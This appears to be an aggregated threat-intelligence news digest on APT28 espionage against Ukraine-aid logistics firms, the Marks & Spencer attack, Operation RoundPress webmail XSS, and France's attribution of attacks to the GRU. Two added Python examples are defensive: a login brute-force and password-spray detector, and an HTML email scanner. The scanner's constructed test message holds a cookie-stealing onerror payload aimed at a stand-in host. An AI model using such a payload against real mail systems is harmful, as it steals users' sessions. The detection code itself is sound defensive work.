@industrialcyber.co
//
A Russian state-sponsored cyber espionage campaign, attributed to the GRU's APT28 (also known as Fancy Bear or Forest Blizzard), has been actively targeting Western logistics entities and technology companies since 2022. This campaign focuses on organizations involved in the coordination, transport, and delivery of foreign assistance to Ukraine. The goal is to gain access to sensitive information and disrupt operations, presenting a serious risk to these targeted organizations and sectors across more than a dozen countries.
The actors have used a mix of previously disclosed tactics, techniques, and procedures (TTPs): credential brute-force attacks, spear-phishing with multilingual lures, and malware delivered through malicious archive files that exploit software vulnerabilities. They have also been observed compromising IP cameras at Ukrainian border crossings to monitor and track aid shipments. The unit responsible, GRU military unit 26165, has been linked to compromises across air, sea, and rail transport.
To defend against these threats, organizations are urged to familiarize themselves with the identified TTPs and indicators of compromise (IOCs), increase monitoring and threat hunting, and strengthen their network defenses. The attacks have targeted companies and government organizations in numerous countries, including Bulgaria, the Czech Republic, France, Germany, Greece, Italy, Moldova, the Netherlands, Poland, Romania, Slovakia, Ukraine, and the United States. The advisory is co-signed by over 20 agencies from multiple countries, underscoring the global nature of this threat.
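The first TTP listed above, credential brute forcing, is one a defender can hunt for directly in authentication logs. The following is an added example, not code from the advisory or from any of the outlets cited below: it walks a constructed, simplified auth log and flags three patterns, repeated failures against one account from one source (brute force), failures against many accounts from one source (password spraying), and a success that follows a run of failures on the same account, which is the event worth escalating. The log format, the thresholds and the five-minute window are assumptions made for the example.

```python
"""Added example: hunt for credential brute force and password spraying in
authentication logs. Not code from the advisory; the log format below is a
simplified, constructed one and the thresholds are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data; documentation address ranges only).
SAMPLE_LOG = """\
2025-05-21T08:00:01Z auth failure user=jdoe src=203.0.113.7
2025-05-21T08:00:04Z auth failure user=jdoe src=203.0.113.7
2025-05-21T08:00:09Z auth failure user=jdoe src=203.0.113.7
2025-05-21T08:00:15Z auth failure user=jdoe src=203.0.113.7
2025-05-21T08:00:22Z auth failure user=jdoe src=203.0.113.7
2025-05-21T08:00:45Z auth success user=jdoe src=203.0.113.7
2025-05-21T08:10:00Z auth failure user=alice src=198.51.100.9
2025-05-21T08:10:02Z auth failure user=bob src=198.51.100.9
2025-05-21T08:10:05Z auth failure user=carol src=198.51.100.9
2025-05-21T08:30:00Z auth success user=dave src=192.0.2.5
2025-05-21T09:00:00Z auth failure user=dave src=192.0.2.5
2025-05-21T09:00:01Z kernel: unrelated line that does not match
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>success|failure) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_events(text):
    """Return (timestamp, result, user, src) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not auth records
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["result"], m["user"], m["src"]))
    events.sort()
    return events


def detect(events, window=timedelta(minutes=5), brute_threshold=5,
           spray_threshold=3):
    """Sliding-window detection over time-ordered events.

    brute_force:            >= brute_threshold failures for one (src, user)
                            inside the window
    password_spray:         failures against >= spray_threshold distinct users
                            from one src inside the window
    success_after_failures: a success on a (src, user) that still has failures
                            inside the window, i.e. a guess may have worked
    """
    alerts = set()
    fails_by_pair = defaultdict(deque)   # (src, user) -> failure timestamps
    users_by_src = defaultdict(deque)    # src -> (timestamp, user) of failures

    for ts, result, user, src in events:
        pair_q = fails_by_pair[(src, user)]
        while pair_q and ts - pair_q[0] > window:
            pair_q.popleft()             # drop failures older than the window

        if result == "failure":
            pair_q.append(ts)
            if len(pair_q) >= brute_threshold:
                alerts.add(("brute_force", src, user))

            src_q = users_by_src[src]
            src_q.append((ts, user))
            while src_q and ts - src_q[0][0] > window:
                src_q.popleft()
            if len({u for _, u in src_q}) >= spray_threshold:
                alerts.add(("password_spray", src, None))
        elif pair_q:
            alerts.add(("success_after_failures", src, user))

    return sorted(alerts, key=lambda a: (a[0], a[1], a[2] or ""))


def hunt(log_text=SAMPLE_LOG):
    """Parse a log and return the sorted list of (kind, src, user) alerts."""
    return detect(parse_events(log_text))


if __name__ == "__main__":
    for kind, src, user in hunt():
        print(f"{kind:24} src={src} user={user}")
```

On the sample log the run reports the 203.0.113.7 brute force against jdoe, the success that follows it, and a spray from 198.51.100.9; the single failure against dave and the unrelated kernel line produce nothing. In production the thresholds need tuning per identity provider, and the source field should be the client address behind any proxy, not the proxy itself.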
References:
- Metacurity: This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies.
- NCSC News Feed: UK and allies expose Russian intelligence campaign targeting western logistics and technology organisations
- CyberInsider: Russian GRU Cyber Campaign Targets Western Logistics and Tech Firms
- securityonline.info: Russian GRU’s APT28 Targets Global Logistics Supporting Ukraine Defense
- securityonline.info: Russian GRU Targets Global Logistics Supporting Ukraine Defense
- www.cybersecuritydive.com: Russian stepping up attacks on firms aiding Ukraine, Western nations warn
- BleepingComputer: A Russian state-sponsored cyberespionage campaign attributed to APT28 (Fancy Bear/Forest Blizzard) hackers has been targeting and compromising international organizations since 2022 to disrupt aid efforts to Ukraine.
- The Hacker News: Russian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022.
- securityaffairs.com: Russia-linked APT28 targets western logistics entities and technology firms
- Threats | CyberScoop: Multi-national warning issued over Russia’s targeting of logistics, tech firms
- socprime.com: Russian GRU Unit 26165 Targets Western Logistics and Technology Companies Coordinating Aid to Ukraine in a Two-Year Hacking Campaign
- Blog: Russian APT28 targets Western firms supporting Ukraine
- Metacurity: Russia's APT28 accused of infiltrating Western logistics, technology firms
- Resources-2: Russian APT28 (aka Fancy Bear/Unit 26165) targets Western logistics and tech firms in Ukraine aid tracking operation
- Virus Bulletin: Details a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies involved in the coordination, transport and delivery of foreign assistance to Ukraine.
- DataBreaches.Net: Western intelligence agencies unite to expose Russian hacking campaign against logistics and tech firms
- www.scworld.com: CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing an elevated threat to supply chains
- eSecurity Planet: Russian Hackers Target Western Firms Aiding Ukraine, Spy on Shipments
- www.esecurityplanet.com: Russian military hackers are targeting Western firms aiding Ukraine, using cyberespionage to infiltrate logistics networks and spy on arms shipments.
- industrialcyber.co: Russian GRU’s Unit 26165 conducts two-year cyber espionage on logistics, tech firms using IP cameras, supply chains
- www.csoonline.com: Russian APT28 compromised Western logistics and IT firms to track aid to Ukraine
Dhara Shrivastava@cysecurity.news
//
British retail giant Marks & Spencer (M&S) is facing a major financial impact following a recent cyberattack, with the potential hit to profit estimated at £300 million ($402 million). The attack has caused widespread operational and sales disruptions, particularly affecting the company's online retail systems. According to a recent filing with the London Stock Exchange, M&S expects these disruptions to continue until at least July, impacting its fiscal year 2025/26 profits.
The cyberattack has significantly impacted M&S’s online sales channels, forcing the company to temporarily halt online shopping in its Fashion, Home & Beauty divisions. This downtime has led to substantial revenue loss, despite the resilience of its physical stores. The company has also faced increased logistics and waste management costs as it reverted to manual processes. CEO Stuart Machin acknowledged the challenging situation but expressed confidence in the company's recovery, emphasizing a focus on restoring systems and accelerating technical transformation.
M&S is actively implementing strategies to mitigate the financial repercussions, including cost management, insurance claims, and strategic trading actions. The retailer is reportedly preparing to claim up to £100 million from its cyber insurance policy to offset some of the losses. The company views this crisis as an opportunity to expedite its technical transformation, although specific details of this transformation have not yet been disclosed. The costs related to the attack itself and technical recovery are expected to be communicated at a later date as an adjustment item.
References:
- The Register - Security: Marks & Spencer warns of a £300M dent in profits from cyberattack
- The DefendOps Diaries: Marks & Spencer Faces Major Financial Impact from Cyberattack
- BleepingComputer: Marks & Spencer faces $402 million profit hit after cyberattack
- ComputerWeekly.com: M&S cyber attack disruption likely to last until July
- BleepingComputer: British retail giant Marks & Spencer (M&S) is bracing for a potential profit hit of up to £300 million ($402 million) following a recent cyberattack that led to widespread operational and sales disruptions.
- techxplore.com: Marks & Spencer cyberattack: How can retailers regain customers' trust after a hack?
- www.cybersecuritydive.com: M&S warns April cyberattack will cut $400 million from profits
- techxplore.com: Cyberattack costs UK retailer Marks & Spencer £300 mn
- www.cysecurity.news: Scattered Spider Cyberattack Cripples M&S, Co-op: DragonForce Ransomware Causes Weeks-Long Disruption
- Tech Monitor: Marks & Spencer faces £300m impact on profit from cyberattack
Field Effect@Blog
//
A cyber espionage campaign dubbed "Operation RoundPress" has been attributed by ESET, with medium confidence, to the Russian state-sponsored group it tracks as Sednit (APT28, Fancy Bear). The operation, active since 2023, targets high-value webmail servers by exploiting cross-site scripting (XSS) vulnerabilities in the webmail software, with the aim of stealing confidential data from specific email accounts. In 2023 it targeted only Roundcube.
In 2024 the scope expanded beyond Roundcube to Horde, MDaemon, and Zimbra. Against MDaemon the group exploited a zero-day XSS vulnerability, CVE-2024-11182, before a patch existed; ESET reported it to the developers on November 1, 2024, and it was fixed in version 24.5.1. Delivery is by spear-phishing email: the message body carries JavaScript that the vulnerable webmail client executes in the victim's browser, in the context of the logged-in webmail session, when the message is rendered, so no attachment has to be opened and no link clicked.
The victims are mainly governmental entities and defense companies in Eastern Europe, though governments in Africa, Europe, and South America have also been targeted. The injected JavaScript payloads, which ESET analysed and named SpyPress, steal webmail credentials and exfiltrate contacts and email messages from the victim's mailbox. In the MDaemon variant the payload also set up a two-factor authentication bypass, according to ESET by creating an application password that gives the attackers persistent access to the mailbox. ESET has published indicators of compromise (IOCs) in its GitHub repository.
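Because the RoundPress payload is JavaScript carried inside an HTML email body, a mail gateway or SOC pipeline can at least flag messages that carry active content before the webmail client renders them. The following is an added example and not ESET's code or an indicator from its report: it parses a constructed MIME message with Python's standard library and reports script tags, event-handler attributes and javascript: URLs found in every text/html part. The sample message and the c2.example.invalid hostname are constructed for the example. A check like this catches the delivery vector only, not the parser bug in the webmail software: a payload that depends on malformed markup the webmail client mis-parses can slip past a well-formed-HTML scan, so patching remains the actual fix.

```python
"""Added example: flag active HTML content in inbound mail, the carrier for
a webmail XSS payload. Not ESET's code; the message below is constructed."""
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser

# Constructed sample message; the "payload" is inert illustrative markup.
SAMPLE_EML = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: Constructed test message
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Plain-text part with nothing suspicious.
--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Hello</p>
<img src="x" onerror="fetch('https://c2.example.invalid/?c='+document.cookie)">
<a href="javascript:void(0)">click</a>
<script>/* inline script */</script>
</body></html>
--b1--
"""

# Elements that can execute or load script when a mail client renders them.
RISKY_TAGS = {"script", "iframe", "object", "embed", "svg", "form"}
# Attributes whose value is a URL and may carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}


class ActiveContentScanner(HTMLParser):
    """Collects tags and attributes that run script when the HTML is rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in RISKY_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):          # onerror, onload, onclick, ...
                self.findings.append(f"event:{tag}@{name}")
            elif (name in URL_ATTRS and value
                  and value.strip().lower().startswith("javascript:")):
                self.findings.append(f"js-url:{tag}@{name}")


def scan_html(html):
    """Return findings for one HTML document, in document order."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_message(raw):
    """Scan every text/html part of an RFC 5322 message given as a string."""
    msg = message_from_string(raw, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print(finding)
```

The scanner reports the onerror handler on the image, the javascript: link and the inline script element; the plain-text part is ignored. Run it from a milter or a post-delivery hook, and treat any finding on mail destined for a webmail deployment as a reason to quarantine rather than merely tag, since the recipient does not have to interact with the message for the script to run.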
References:
- Blog: Russian APT28 hackers leverage webmail zero-day
- ESET Research: publishes its investigation of Operation RoundPress, which uses XSS vulnerabilities to target high-value webmail servers. We attribute the operation to Sednit with medium confidence. In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra.
- The Hacker News: Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers
- The DefendOps Diaries: Government Webmail Hacked via XSS Bugs in Global Spy Campaign
- securityonline.info: Operation RoundPress: Sednit Weaponizes XSS to Breach Global Webmail Servers
- Virus Bulletin: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers with spear-phishing emails leveraging an XSS vulnerability. Most of the victims are government entities and defence companies in Eastern Europe.
- WeLiveSecurity: Sednit abuses XSS flaws to hit gov't entities, defense companies
- WeLiveSecurity: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
- www.scworld.com: Global government webmail servers targeted by Russian cyberespionage operation
- BleepingComputer: Hackers are running a worldwide cyberespionage campaign dubbed 'RoundPress,' leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations.
- securityonline.info: Researchers expose a covert cyberespionage campaign, dubbed Operation RoundPress, believed to be orchestrated by the Russia-aligned Sednit APT group.
- www.techradar.com: Global Russian hacking campaign steals data from government agencies
- www.scworld.com: Sednit group's 'Operation RoundPress' targets webmail servers globally
- hackread.com: ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail…
- Thomas Roccia :verified:: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
- ciso2ciso.com: Russian APT Exploiting Mail Servers Against Government, Defense Organizations – Source: www.securityweek.com
Swagath Bandhakavi@Tech Monitor
//
France has officially accused the APT28 hacking group, linked to Russia's military intelligence service (GRU), of orchestrating a series of cyberattacks against French institutions over the past four years. The French foreign ministry condemned these actions "in the strongest possible terms," citing the targeting or breaching of a dozen French entities. The attacks have affected a range of organizations, including public services, private companies, and a sports organization involved in preparations for the 2024 Olympic Games hosted in France.
France views these cyber operations as "unacceptable and unworthy" of a permanent member of the UN Security Council, asserting that Russia has violated international norms of responsible behavior in cyberspace. The ministry emphasized that such destabilizing activities undermine the integrity of international relations and security. This public attribution of the attacks to the GRU signifies a firm stance against Russia's malicious cyber activities and a commitment to defending French interests in the digital realm.
France, alongside its partners, is determined to anticipate, deter, and respond to Russia's malicious cyber behavior, employing all available means. The French foreign ministry's statement also referenced past incidents, including the 2015 sabotage of TV5Monde and attempts to disrupt the 2017 presidential election, underscoring a pattern of APT28 activity against French interests. ANSSI, the French national agency for information systems security, has released a report on the APT28 threat to help organizations prevent future attacks.
References:
- therecord.media: In a rare public attribution, the French foreign ministry said it "condemns in the strongest possible terms" the actions of the GRU-linked threat actor known as APT28 for attacks against local entities.
- BleepingComputer: Today, the French foreign ministry blamed the APT28 hacking group linked to Russia's military intelligence service (GRU) for targeting or breaching a dozen French entities over the last four years.
- www.diplomatie.gouv.fr: Government of France attributes a wide range of cyberattacks dating back ten years, targeting the French-hosted 2024 Olympics, prior elections, and entities such as television networks, to Russia's GRU
- The Record: Mastodon post referencing the French foreign ministry statement that it "condemns in the strongest possible terms" the actions of the GRU-linked threat actor known as APT28 for attacks against local entities.
- The DefendOps Diaries: The article is about unmasking APT28: The Sophisticated Threat to French Cybersecurity
- bsky.app: Russian military intelligence cyber operations targeting French entities
- www.techradar.com: France accuses Russian GRU hackers of targeting French organizations
- securityaffairs.com: France links Russian APT28 to attacks on dozen French entities
- Metacurity: France accuses Russia's APT28 of a string of serious cyberattacks going back to 2021
- Risky.Biz: Risky Bulletin: French government grows a spine and calls out Russia's hacks
- Tech Monitor: France links Russian military-backed hackers APT28 to multiple cyber intrusions
- hackread.com: France accuses Russia’s APT28 hacking group (Fancy Bear) of targeting French government entities in a cyber espionage campaign.
- bsky.app: Russian military intelligence cyber operations targeting French entities. Primarily includes governmental, diplomatic, and research entities, as well as think-tanks.
- www.scworld.com: French authorities have condemned a long-term cyber-espionage campaign by a Russian military intelligence group, APT28, targeting various French institutions.
- www.csoonline.com: France has publicly accused Russias GRU military intelligence agency, specifically its APT28 unit, of orchestrating a sustained cyber campaign targeting French institutions to undermine national stability, Reuters reports.
- Industrial Cyber: The French foreign ministry has attributed a series of cyberattacks on national interests to APT28, a group linked...
- hackread.com: From TV5Monde to Critical Infrastructure: France Blames Russia’s APT28 for Persistent Cyberattacks
- securityonline.info: APT28 Cyber Espionage Campaign Targets French Institutions Since 2021